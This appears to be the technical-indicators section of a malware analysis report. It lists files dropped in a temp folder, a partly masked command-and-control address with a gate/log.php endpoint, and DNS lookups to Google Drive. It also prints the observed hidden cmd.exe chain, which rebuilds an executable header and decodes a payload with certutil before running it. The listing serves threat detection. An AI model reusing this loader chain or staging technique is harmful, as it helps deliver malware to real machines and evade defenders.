Technical Information
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\7zipsfx.000\bolo.com
- %TEMP%\7zipsfx.000\lsm.com
- %TEMP%\7zipsfx.000\vngg.com
- %TEMP%\7zipsfx.000\smss.com
- %TEMP%\7zipsfx.000\treaz
- %TEMP%\7zipsfx.000\lsm.com
- %TEMP%\7zipsfx.000\bolo.com
- %TEMP%\7zipsfx.000\smss.com
- '34.##.125.60':80
- http://34.##.125.60/gate/log.php
- DNS ASK drive.google.com
- DNS ASK do#########ocs.googleusercontent.com
- '%TEMP%\7zipsfx.000\smss.com' treaz
- '%WINDIR%\syswow64\cmd.exe' /c <nul set /p ="M" > smss.com & type lsm.com >> smss.com & del lsm.com & certutil -decode bolo.com treaz & smss.com treaz & timeout 1' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c <nul set /p ="M" > smss.com & type lsm.com >> smss.com & del lsm.com & certutil -decode bolo.com treaz & smss.com treaz & timeout 1
- '%WINDIR%\syswow64\certutil.exe' -decode bolo.com treaz
- '%WINDIR%\syswow64\timeout.exe' 1
- '%WINDIR%\syswow64\svchost.exe'